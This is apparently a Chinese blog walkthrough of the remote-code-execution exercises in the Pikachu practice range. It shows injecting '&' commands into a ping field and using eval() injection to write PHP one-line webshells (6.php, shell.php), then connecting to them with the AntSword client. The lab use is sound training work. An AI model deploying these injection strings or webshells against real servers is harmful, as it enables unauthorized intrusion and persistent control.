Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
weixin_3077791317 分钟前
PHP 大文件上传:内存占用、超时与最佳实践
linux·服务器·开发语言·nginx·php
国际云,接待17 分钟前
云服务器 SSH 被扫爆了怎么办:安全组、密钥登录与 Fail2ban 的完整加固清单
服务器·安全·ssh
闲云野鹤在人间21 分钟前
项目实战:LNMP-电商平台-ECshop
linux·运维·nginx·apache·lvs
李小白6628 分钟前
1-Shell编程和网络服务介绍
运维·云计算
吹什么轩39 分钟前
linux网络:UDP套接字的业务实现:字典
linux·运维·udp
啊啊啊啊啊!!!!1 小时前
【Linux】初始Linux操作系统
linux·运维·服务器
数字新视界1 小时前
信创动环监控厂家深入剖析智能机房环境监控技术应用与挑战
服务器·数据库·物联网·芯片·动环监控系统
数据知道1 小时前
XXE 漏洞深度实战:XML 外部实体攻击与 OOB 带外
xml·网络·安全·网络安全
用户762886860051 小时前
内存取证-volatility_2.6工具使用教程
安全